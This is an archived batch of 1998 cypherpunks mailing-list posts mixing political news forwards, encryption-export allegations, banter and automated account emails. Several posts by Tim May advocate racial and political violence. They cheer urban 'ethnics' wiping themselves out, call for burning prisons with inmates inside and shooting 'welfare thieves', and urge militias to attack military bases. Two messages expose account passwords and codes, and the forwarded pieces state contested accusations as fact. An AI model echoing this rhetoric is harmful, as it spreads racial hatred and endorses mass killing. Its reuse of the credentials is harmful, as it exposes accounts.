In September 1996, the Federal Deposit Insurance Corp.
 said Mrs. Clinton and Mr. Hubbell drafted legal papers that
 Madison used to deceive bank examiners and divert $300,000
 to Mr. Hubbell's father-in-law, Seth Ward. The report said the
 papers "facilitated the payment of substantial commissions to
 Mr. Ward, who acted as a straw buyer" in Castle Grande. A
 straw buyer is one who owns property in name only, having
 never put up any money or assumed any risk.

The FDIC said the Ward payments were in violation of
 federal regulations. The report did not accuse Mrs. Clinton or
 Mr. Hubbell of criminal wrongdoing, although it raised serious
 questions about their involvement in a deal that ultimately cost
 taxpayers $3.8 million when Castle Grande failed.

Prosecutors, the report to Congress said, immediately
 recognized parallels between the job help provided to Miss
 Lewinsky by Washington lawyer Vernon E. Jordan Jr., a
 longtime Clinton friend, and "his earlier relationship" with Mr.
 Hubbell, sentenced in 1994 to prison for stealing $420,000
 from his Rose Law Firm partners. By late 1997, Mr. Starr had
 evidence Mr. Jordan helped Mr. Hubbell obtain consulting
 contracts after he agreed to cooperate in the Whitewater
 probe.

In 1994, Mr. Hubbell was paid $450,010 by 17 different
 persons or entities as a consultant and $91,750 in 1995,
 despite beginning a 28-month prison term in August of that
 year. He has yet to explain what work he did for the cash.

Some of the payments came from MacAndrews & Forbes
 Holding Co. in New York after he was introduced to the firm's
 executives by Mr. Jordan, a director of Revlon Inc. The
 cosmetics firm, controlled by MacAndrews & Forbes, also
 offered a job to Miss Lewinsky based on Mr. Jordan's
 recommendations.

With regard to Mrs. Tripp's personnel records, Mr. Starr
 has been investigating if they were illegally released in an effort
 to tarnish her reputation in the Lewinsky probe. Assistant
 Defense Secretary Kenneth Bacon approved the release to a
 reporter for the New Yorker magazine. The records show
 Mrs. Tripp was detained by police as a teen-ager 29 years ago
 and had not noted the arrest in her 1987 security clearance
 form.

The arrest later was shown to have been a teen-age prank,
 in which she pleaded guilty to a reduced charge of loitering.

Former White House Deputy Chief of Staff Harold Ickes
 was questioned about the documents by the grand jury. Mr.
 Bacon also testified in the case.

 In our Investigative Section, a history of the Whitewater
 investigation.

Copyright (c) 1998 News World Communications, Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Sep 1998 12:15:48 +0800
To: cypherpunks@cyberpass.net
Subject: Digital Wiretap Delayed
Message-ID: <199809141717.NAA24367@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer John Markoff's report today on the FCC decision to 
delay implementation of the FBI's digital wiretap requirements
under CALEA, along with the text of the decision:

   http://jya.com/calea-delay.htm  (93K)

The decision has a good review of the technical issues,
and explains why telco appeals of the requirements justified the 
postponement.

CTIA posted here a notice of this on Friday.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 15:57:08 +0800
To: cypherpunks@toad.com
Subject: Deadly Spice or Seventh Seal?
In-Reply-To: <TFSQQZKI@idg.se>
Message-ID: <v0313030ab22330cf7625@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:08 PM -0700 9/14/98, harald.fragner@idg.se wrote:
>> Why yes, yes you do.  Don't you recognize the black robe, the scythe,
>> the bony hand, the less-than-cheerful disposition?
>>
>> See if you can figure it out.  And please hold still for a moment.  Let
>> me just wind up here with this thing....
>
>Ultima Online?
>

No, but here are some other choices:

#1: The long lost Power Ranger.

#2: The latest member of the Spice Girls, "Deadly Spice."

#3: The character played by your own countryman in a famouns Ingmar Bergman
film.

All the hints you'll get today.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody <nobody@usbullionexchange.com>
Date: Mon, 14 Sep 1998 15:00:02 +0800
To: cypherpunks@toad.com
Subject: Dallas Gold & Silver Exchange Registration
Message-ID: <199809141958.OAA04229@usbullionexchange.com>
MIME-Version: 1.0
Content-Type: text/plain



this is your account information for the dallas gold and silver exchange

please save this message and put it in a safe place.

user name: cypherpunks
password:  5t9vd7

expires:   Wed Oct 14 14:58:25 1998

Thank you for requesting your 30 day free trial online metals spot trading
from Dallas Gold and Silver. You may use your account as often as you wish
for 30 days. You may want to activate your account by calling 1-800-527-5307
and registering for only  per month.  

Your username is: cypherpunksYour temporary account password is: 5t9vd7


If you have any problems entering your password be sure to look for alpha-numerical similarities ie: the letter O and the number 0, the letter l and the number 1 etc.... Please try these combinations before contacting us for technical support. Thank You.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 14 Sep 1998 16:53:35 +0800
To: jd@metriguard.com
Subject: emission test, Black and White Test of Cryptographic Algorithms, & settlement
Message-ID: <35FD8CF1.4532@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Monday 9/14/98 2:33 PM

Don

When I drove back from Pullman in about 9/96 I realized the valve seals
were
leaking in my VW Rabbit. Blue smoke coming out the exhaust pipe. 

Passing the low speed carbon monoxide test is the hardest.

On 09/06/96 the emission test showed

	Standard	Current Reading	Result
	1.20		2.88		FAIL	

You showed me your tool to change seals.  But I needed to work on other
projects.

After spending about $400 to get the seals replaced, I got another
test on 09/10/96

        Standard	Current Reading	Result
	1.20		1.31		FAIL	

In DESPERATION I used Berryman's B-12, changed oil, etc and
REMOVED THE AIR FILTER for the test on 09/11/96

	Standard	Current Reading	Result
	1.20		1.19		PASS

Talk about squeaking by!

If your vehicle continues to FAIL emissions test, your life will be made
extremely
disrupted by the VEHICLE POLLUTION MANAGEMENT DIVISION.

The Rabbit had its 1998 emission test due in September 1998.  

I was totally prepared for failure.

I ordered about $500 in parts from JC Whitney in preparation for a
DISRUPTIVE
engine rebuild.

And, of course, I ordered for the fun of it the NAFTA [Mexico] exhaust
headers.

I could not wait to see the effect of exhaust headers on performance, so
I installed
them immediately.  WOW!  I estimate about a 20-30% performance
improvement.
Rpms up the ying-yang.

Patty kept putting the 1998 emissions notice on my dinner plate.

On Saturday I took a FAST ride to Oro Guay peak and hiked.  I took a
FAST 
return trip.

I drove into EXPRESS EMISSION operated by Dung Nguyen.  I wanted to see
how badly my grey rabbit, R2, would fail.

R2 is how the grey rabbit is denoted in my repair log.

I couldn't stand to personally watch R2 fail, so I went outside while it
was tested.

On my return the two operators were smiling both and had their thumbs
pointed up!

R2 PASSED!!!!

	Standard	Current Reading	Result
	1.20		00.13		PASS

!Viva NAFTA exhaust headers!

ANOTHER disruption out of the way so that I can concentrate on
completing the digital FX!

My HUGE FEAR what that I would have to spend time getting R2 into shape
to POSSIBLY
PASS the emissions test.  TRYING to get a car which failed the emissions
test is a nightmare!

Sandia colleague Ron Pate had to have a rebuilt engine installed in his
bronco so that it would pass.

  Black and White Test of Cryptographic Algorithms, by William H. Payne

advertised at 

  http://www.aci.net/kalliste/ /

and presented at

  http://zolatimes.com

will hopefully AID in getting my other distraction settled.  

Then, too, of course, are the JUSTIFIABLY upset MUSLIMS who are reading
my zolatimes article.

Sandia president C. Paul Robinson observed at 
http://www.jya.com/its-us.htm wrote

  A quick walk around the globe: other emerging threat nations ...

  What is perhaps most frightening is the apparent increase in the flow
of technology, hardware, and a "barter system" in dangerous materials.  
We must understand "What are their motives?"

Simple, in one case.  Settlement.  

WE WANT OUR MONEY!  This is on Internet at http://www.jya.com/crypto.htm

  DoE: Pay Bill Payne  

Thought about you guys at the fun Metriguard Monday corporate lunch.

The Acer scsi Scan Prisa I ordered just arrived by UPS.

Now I can scan in my schematics.  And bash the Great Satan EVEN HARDER.

But let's all hope for settlement before matters get WORSE.

Later
bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 14 Sep 1998 09:35:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: [Fwd: new threat to privacy]
In-Reply-To: <v04011708b22047020d29@[139.167.130.247]>
Message-ID: <35FD2950.98C77B4D@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:
> 

> Investigators need only know your e-mail address to secretly
> install the program. Once they do, investigators can read your
> documents, view your images, download your files and intercept
> your encryption keys. DIRT was developed to assist law
> enforcement in pedophilia investigations, but future uses could
> include drug investigations, money laundering cases and
> information warfare.

Does downloading of files includes files without public read permit?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@acm.org
Date: Mon, 14 Sep 1998 16:35:21 +0800
To: cypherpunks@toad.com
Subject: ACM Account Verification Code
Message-ID: <905808372.AA10188@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Dear Joe Cypherpunks:

Thank you for establishing an ACM account.  To complete
the process, you must return to Step 3 and verify your account.
You will find your account verification code listed at the end
of this message.  The code is case sensitive, and does not
contain any digits.

Select the "Continue to Step 3" button from the "Create an
Account" page at <http://www.acm.org/account/create.html>.

Do not repeat Steps 1 and 2. (See note below.)

Enter your username, password and verification code into
the appropriate fields and activate the "Verify Account"
button.

         Username: cypherpunks@toad.com
Verification Code: AFGKE   

If you have any questions or comments please contact
webmaster@acm.org.

Sincerely,
The ACM Webmaster


Note: if you repeat steps 1 and 2, your old account is
deleted and the verification code associated with it
will not be valid.  A new code is created and sent.
You must use the new code to verify your account.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Just a reminder:  if you have not subscribed to the Digital
Library, you can still browse the Library and access bibliographic
information.  Your account username and password will act as
your authentication.

Visit the Digital Library at <http://www.acm.org/dl/>.
Read about subscribing to the Library at
<http://www.acm.org/dl/slide8.html>

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

// This message was generated by ENS. The public key //
// is available at http://www.acm.org/sys/ens.html   //


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBNf2Hp840plPFvmzxAQHfOwL/Srm7AQXIiNoP10jllyU4rDxYslYvPwqm
7xRvRfNadT2fkW0DNfCJhdr2Gd40cSpUqKBAvn8uPIsKeuT6G2NX65tHe5crNpDx
XSDva/VV9OZWSgnEHuUulabmjdv/Bhux
=P/RE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 18:46:08 +0800
To: cypherpunks@toad.com
Subject: Re: Deadly Spice or Seventh Seal?
In-Reply-To: <TFSQQZKI@idg.se>
Message-ID: <v0313030bb22358d1dc69@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:48 PM -0700 9/14/98, Tim May wrote:
>At 1:08 PM -0700 9/14/98, harald.fragner@idg.se wrote:
>>> Why yes, yes you do.  Don't you recognize the black robe, the scythe,
>>> the bony hand, the less-than-cheerful disposition?
>>>
>>> See if you can figure it out.  And please hold still for a moment.  Let
>>> me just wind up here with this thing....
>>
>>Ultima Online?
>>

>No, but here are some other choices:
>
>#1: The long lost Power Ranger.
>
>#2: The latest member of the Spice Girls, "Deadly Spice."
>
>#3: The character played by your own countryman in a famouns Ingmar Bergman
>film.
>
>All the hints you'll get today.

Actually, I misspoke. The famous Swedish actor played the _knight_ who
faced this character, not the character itself. (Hint: This actor also
played the exorcist of Regan.)

And the character itself made a guest appearance in one of Bill and Ted's
Excellent Adventures.


--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 18:40:12 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980913130607.4039E-100000@well.com>
Message-ID: <v0313030cb2235a1728e9@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:49 PM -0700 9/14/98, tzeruch@ceddec.com wrote:

>
>Clinton can still veto the omnibus appropriations bill or threaten to
>"shut down the government" (= shut down government spending instead of
>leaving it running while nothing else gets done).

Hey, don't rule this out. Clinton may welcome shutting down the
government...after all, it was during the 1995 shutdown that Clinton got in
touch with his horndog self. To wit, normal employees were all sent home,
and the delivery girl role was played by Monica Lewinsky, who delivered
some pie to Clinton one quiet evening.

--Tim May



(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 14 Sep 1998 20:12:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: A CLINTON DIRTY BOOK STORY
In-Reply-To: <v04011702b22351691632@[139.167.130.246]>
Message-ID: <35FDBFDA.4CE5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> The claims made by Bernard Schwartz and Loral that they did not
> knowingly export military technology to China contradicts the
> official briefing documents given to Ron Brown in 1994.  One
> Loral document obtained from the files of Ron Brown, labeled
> "for Secy. Brown", has a page titled "Commercial Applications Of
> DoD Technology".  This document lists "Intelsat", "Cellular -
> Globalstar" and "Direct Broadcast Satellite" technology along
> with a variety of other products developed from "DoD" projects.
> Thus, Loral knowingly exported systems they developed for the
> U.S. military to China.
> 
I can think of several versions of this:

a. simple money and politics - company wants big $ deal, contributes to
right politicians. ( |$| > |USA| ) --> fast track for deal

b. round 2 of crypto-AG - they want to listen to the Chinese so they had
better be the equipment vendor. Who operates the satellites that the
Chinese radios use?

You might say that to meet US Intelligence needs the range of products
available outside the US should be minimized and those that are shipped
should come from companies that cooperate with the NSA. It makes some
*small* amount of sense but certainly plays hell with what an
entrepreneurial type might want to accomplish. Pretty unfair in that
regard. Especially since they have no visible control over
extraterritorial ventures anyway. Civilian interest and capability in
crypto must piss these guys off beyond belief. Stupid Constitution!

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 20:15:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
In-Reply-To: <35FDD227.4C7D@yankton.com>
Message-ID: <v0313030fb2236dd4cc39@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain




Good post. The war is about to be joined.

At 7:34 PM -0700 9/14/98, nnburk wrote:
>Predictions: Crime and Criminal Justice in the 21st Century
>
>1.      The United States will experience a significant economic
>recession/crisis very close to the turn of the Century.
>

Agreed. The chickens are coming home to roost. America will get what it
deserves. I figure the Y2K problem will be the most significant trigger
event.

>2.      As the large pool of young people born in the early 1990s
>become teenagers and young adults, there will be a dramatic
>increase in violent crime around the year 2005-2010.

See "A Clockwork Orange" for details. Today's Ebonics kids will be
tomorrow's Droogs.

>3.      America will experience sporadic civil disorders/riots in
>many of its urban areas during the next 10-15 years -- much of it
>related to racial/ethnic problems.

The inner cities will burn. 10 million ethnics will wipe themselves out.
White America (and Asian America, who are honorary whites, by the
University of California's admissions standards) will cluck, but will watch
the inner cities burn themselves out with only a "I told you so" attitude.
Miami, Chicago, Washington, LA, New York, Atlanta, New Orleans, and a dozen
other cities will be like Berlin after the war.

>
>4.      Terrorist acts by "fringe"/special issue groups will
>increase at a significant rate -- becoming a major law enforcement
>and security problem.

Freedom fighters, not terrorists.

>5.      As faith in the criminal justice system declines, there
>will be a rise in vigilante-based incidents where citizens take
>the enforcement of crime problems into their own hands.

Local justice, not vigilantism. OJ and You Know Who hanged side by side.
Several million welfare thieves given  the choice of hard labor for 20 or
so years, to repay the money they stole, or a bullet to the head. Their
choice.

>6.      Much of middle- and upper-class America will take a
>"retreatist" attitude and move into private high-security
>communities located in suburban or rural areas. Because of
>technological advances, many companies and corporations will also
>move out of the urban environments as well.

Yes, more and more of my wealthy friends are doing this. Most of them are
moving to the country, where defenses are more naturally provided, and not
necessarily moving to gate communities (which are actually quite
indefensible when the welfare addicts and gangbangers start rioting and
dancing.)


>7.      Due to many of the predictions listed above, much of law
>enforcement and security in the 21st Century will become
>privatized and contractual. Traditional law enforcement agencies
>will primarily serve urban and rural communities.

"Snow Crash."

>
>8.      Law enforcement will evolve into two major and divergent
>roles: traditional law enforcement and a more specialized
>military tactical role to deal with the growing urban violance
>and terrorist incidents.

Has already happened. The National Police Force is already mobilized
against religious groups which are deemed unacceptable, pace the Branch
Davidians.

>9.      Significant violence and unrest will plague our nation's
>prisons. Major prison riots will become a regular occurrence.

Burn the prisons with the inmates locked inside. Then simply execute those
who commit the most serious crimes.


>10.     With the decrease of the possibility of major global
>warfare, the United States military will take on an increased
>domestic "peace-keeping" role with America's law enforcement
>agencies.

Posse comitatus is already becoming a moot point. The Army will be
patrolling the streets within a few years, probably coterminous with Y2K
problems and the resulting martial law.

Militias and freedom fighters will have to start hitting U.S. military
installations. Many will die. Eventually the military will abandon the
Washington elite and will join the freedom fighters.

Ten million politicians and welfare thieves will be put up against the wall.


--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harald.fragner@idg.se
Date: Mon, 14 Sep 1998 12:02:16 +0800
To: cypherpunks@toad.com
Subject: Hi!
Message-ID: <TFSOTJXK@idg.se>
MIME-Version: 1.0
Content-Type: text/plain



Do I know you?

Harald

------------------
Harald Fragner
IT-avdelningen, IDG
Tel: 08-453 60 10
Fax: 08-453 60 05
Email: harald.fragner@idg.se




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 20:43:59 +0800
To: cypherpunks@Algebra.COM
Subject: Harald to be hit with U.S. cruise missiles
Message-ID: <v03130311b2237719f9a9@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:45 PM -0700 9/14/98, HyperReal-Anon wrote:
>On Mon, 14 Sep 1998 harald.fragner@idg.se wrote:
>
>>
>> Do I know you?
>>
>> Harald

>No, but we know you! You're a very evil man, Mr. Fragner, at least by the
>standards of the Hired Government Ninjas. Under our standards, everyone is
>evil...except government leaders.
>
>Expect black helicopters to be targetting your house in the next few days.
>Do not be surprised if unguided rockets are shot into it. If ninjas are
>coming through your windows at 2AM, just remember: We're from the
>government and we're here to help you. Just bend over and grip the towel
>rack.

This is reprehensibile!

HyperReal-Anon is alerting a Confirmed Net Terrorist to a planned U.S.
cruise missile attack on Harald. Harald's crimes are not important. What is
important is that the U.S. Muffdiver William Jefferson Clinton has orded
the Northern Fleet to strike Harald's home and hometown and to report that
Harald was a known associate of both Asama bin Laden and Phillip
Zimmermann, known freedom fighters.

Harald will learn that Six Degrees is monitoring all thoughtcrimes.

Besides, Harald apparently used Roundup in his garden, the same nerve gas
precursor found at the Baby Milk and Marzipan Factory in Khartoum. This
means that Harald was manufacturing nerve gas in his Swedish home.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tzeruch@ceddec.com
Date: Mon, 14 Sep 1998 17:48:42 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980913130607.4039E-100000@well.com>
Message-ID: <98Sep14.184802edt.43010@brickwall.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 13 Sep 1998, Declan McCullagh wrote:

> On Sat, 12 Sep 1998, Tim May wrote:
> 
> > * What goes around, comes around. The Liberal puke Democrats who crucified
> > Bob Packwood, Clarence Thomas, and any number of corporate people charged
> > with "sexual harassment," are now reaping what they sowed. "If she says it
> > happened, it happened," the mantra of the feminazi left, is now apparently
> > forgotten by Patricia It's not our business" Ireland.
> 
> There's also the idea popular in some gender feminist circles that the
> imbalance of power in manager-employee relationships makes it impossible
> for genuine consent to be given. Can there be any greater power imbalance
> than the president of the United States and an intern? Where are the
> feminist cries of outrage?

I think they have abandon Aristotelian (or any other phylum of) Logic,
replacing it with something called post structuralist thinking.  Since it
lacks a structure, it is hard to figure out how to explain it.  Apparently
it is a system where "Male Lesbians" exist.  So because Clinton does what
the GFs want, maybe he isn't really powerful at all (name anyone who is
both powerful and submits to GFs, at least in contexts not included in the
Starr report).  No, it doesn't really make sense, but I don't think it is
supposed to.

> > * Lawmaking is paralzyed, frozen, stillborne. This I count as a Good Thing.
> > Even better will be another 8-10 months of this nightly spectacle. No
> > Health Care Reform, no Communications Decency Act II, no Tobacco Act,
> > nothing.
> 
> In general you might be right. But for "noncontroversial" measures like
> CDA II, well, it'll be in one of the appropriations bills that will be
> approved in the next three weeks.

Do libraries now ban minors' access to MSNBC, CNN, ... The House of
Representatives, and the Library of Congress?  And things like NetNanny
and SurfWatch?

Clinton can still veto the omnibus appropriations bill or threaten to
"shut down the government" (= shut down government spending instead of
leaving it running while nothing else gets done).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 14 Sep 1998 12:06:29 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809141658.SAA03123@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think a more appropriate question might be who we aren't.  Believe me,
you'll have an acute understanding of who we are soon enough.
MUWAHAHAHAHA!

Was that sinister enough?


At 06:27 PM 9/13/98 -0700, Well now I am a Mommy! wrote:
>hi,
>
>I see you added me as a friend..... just wondering who you are.  :)
>
>Christy
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 14 Sep 1998 18:06:09 +0800
To: cypherpunks@cyberpass.net
Subject: IP: A CLINTON DIRTY BOOK STORY
Message-ID: <v04011702b22351691632@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Subject: IP: A CLINTON DIRTY BOOK STORY
Date: Mon, 7 Sep 1998 14:04:32 -0400 (EDT)
From: softwar@us.net (CharlesSmith)
To: ignition-point@majordomo.pobox.com
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

In late 1994 the U.S. State Department denied Phil Karn his
request to export a PC disk.  Mr. Karn already had sold the
book, APPLIED CRYPTOGRAPHY written by Bruce Schneier, without
restriction.  Mr. Karn also included a disk of text source code
(in human readable format) that was also printed in the book.

The book and the disk were freely sold, with no checks, in
retail American bookstores.  According to the Clinton
administration, Karn's disk was a threat to national security.
Newly released documents from the State Department, written in
November 1994, shows the White House National Security Council
(NSC) directly approved the decision to deny Karn's request
while allowing the export of military encryption to China.

The document, a letter written by Wendy Sherman, State
Department Assistant Secretary of Legislative Affairs, to then
Congresswoman Maria Cantwell (D WA) was provided to Bill
Clements of the NSC for White House approval.  In addition, the
document includes a fax on Karn's export problem titled "TO:
Pres. Clinton".  Ordie Kittrie, the State Department Attorney
for Political-Military Affairs, wrote "Attached is draft
response to Rep. Cantwell ie Karn encryption disk...  Please
provide me with any comments by noon Friday, November 18."

"The decision that controls should continue was based on several
consideration," wrote Ms. Sherman.  "The administration will
continue to restrict export of sophisticated encryption devices,
both to preserve our own foreign intelligence gathering
capability and because of the concerns of our allies who fear
that strong encryption technology would inhibit their law
enforcement capabilities.  One result of the interagency review
of Mr. Karn's disk was a determination that the source code on
it is of such a strategic level as to warrant continued State
Department licensing."

Of course, any criminal or terrorist could simply purchase the
book and key the code in.  A slightly richer criminal could even
use an Optical Scanner (OCR) and convert the pages directly into
readable source code in less time.  Even a secret Commerce
briefing document from a 1996 meeting with Janet Reno openly
admits the futile nature of trying to restrict PC diskette or
software export.  "Lost in the debate," states the secret 1996
Commerce Department document.  "But not irrelevant, is the fact
that it is virtually impossible to enforce export control's
against them when they can be exported by phone and modem or/in
someone's pocket."

At first the Clinton encryption policy seems absurd or simply
driven by bureaucratic red tape.  Alas, nothing is further from
the truth.  The policy was used as a means to extort donations
for the DNC or by Clinton insiders bent on making big bucks.

The Chinese Army was not interested in PC programs or diskettes
their agents could buy openly in a retail bookstore.  The PLA
under the Clinton administration has been in the business of
acquiring commercial applications of "Defense" technology.  For
example, in November 1994 Motorola employee and former Clinton
White House NSC member Richard Barth began his successful
request to sell encrypted radios and cellular phones to the
Chinese Police.

Motorola's Barth wrote to Theodore McNamara Assistant Secretary
of State on November 23, 1994.  "This is to request that your
office initiate action to obtain a waiver from requirement for
individual export license notifications to Congress for wireless
mobile communications systems containing encryption for China.
Such a waiver was issued by the President in September of this
year for civilian satellite systems and encrypted products for
use by American firms operating in China."

According to Barth, a high-tech trade war had erupted between
the U.S. and Britain.  "European firms," wrote Barth.
"Including Nokia, Ericsson, Alcatel and Siemens, have for a
number of months been able to market and sell GSM cellular
systems with A5-2 encryption in China as a result of a decision
taken by the UK intelligence agency, GCHQ."

By July 1995, the CEO of Motorola, Gary Tooker, wrote a personal
note to Ron Brown, expressing his gratitude for Clinton's
signature approving encryption exports.  "I am writing to thank
you," wrote Tooker to Brown.  "And some key members of the
Commerce Department for your assistance in obtaining the
Presidential waiver for encryption export sales to China."

The Motorola saga of Barth is not the only example of Bill
Clinton's two-faced policy on high-tech exports.  In fact,
President Clinton personally authorized the transfer of an
encrypted air traffic control system to the Chinese Air Force.
It is this particular export which illustrates the difference
between military encryption and civilian, such as Karn's disk of
PC programs.

The Chinese Air Force runs the civilian air control in their
country.  The U.S. built air traffic system is not only run by
PLAAF officers but it is also plugged directly into their air
defense.  According to the recent GAO testimony on Clinton
waivers "Waivers were also granted to permit the export of
encryption equipment controlled on the Munitions List.  One case
involved a $4.3-million communications export to China's Air
Force."

Not only are Chinese fighters and missiles more effective thanks
to Bill Clinton but China has also exported a modified version
of the U.S. system to Iraq.  The Chinese version, called "Tiger
Song", includes U.S. and French made parts.  The Tiger Song
system allows Iraq to track and target U.S. fighters using a
high speed, secure, fiber optic command network.

All radars in Iraq, civilian and military, are now linked
together into Tiger Song.  Iraqi missiles and military radars
are also now playing a giant shell game with U.S. air forces,
using pre-built camouflaged sites wired with hidden fiber optic
cables, scattered all over the country.

Another military example of Clinton crypto export controls is
the sales of Hughes, Motorola, and Loral satellites to the
Chinese military.  The satellites were sold complete with
on-board secure telemetry systems hardened to absorb the intense
radiation of space - something that can be directly applied to
nuclear weapons.  The satellites exported to China in question
were so classified that whole sections of Federal law, the U.S.
Munitions List, were deleted or waived by Bill Clinton.

The claims made by Bernard Schwartz and Loral that they did not
knowingly export military technology to China contradicts the
official briefing documents given to Ron Brown in 1994.  One
Loral document obtained from the files of Ron Brown, labeled
"for Secy. Brown", has a page titled "Commercial Applications Of
DoD Technology".  This document lists "Intelsat", "Cellular -
Globalstar" and "Direct Broadcast Satellite" technology along
with a variety of other products developed from "DoD" projects.
Thus, Loral knowingly exported systems they developed for the
U.S. military to China.

Did Mr. Clinton consult with U.S. allies prior to allowing top
DNC donors export rights to military gear?  According to
Motorola, the staunchest U.S. ally, Great Britain, was an
economic adversary.  Clearly, the strategic concerns of South
Korea, Japan and the Philippines were never considered.  Under
Bill Clinton our allies from the Cold War were competitors in a
economic war for money.

Furthermore, in September 1998 FBI Director Freeh testified
before the Senate Committee on Terrorism.  As predicted, Freeh
pushed the "Bin Ladden" terrorism button while requesting a ban
on domestic PC encryption programs.  The use of encryption by so
called terrorist organizations is balanced by the use of the
same technology by law abiding citizens to protect themselves
from criminals.  The fact that Bin Ladden is armed with
encryption comes as no surprise since he was, after all, trained
by the CIA to fight the Soviets in Afghanistan.  Once a freedom
fighter and now a terrorist.

One similar historic example to Bin Ladden is "VULA".  In the
1980s the South African National Congress (ANC) used encryption
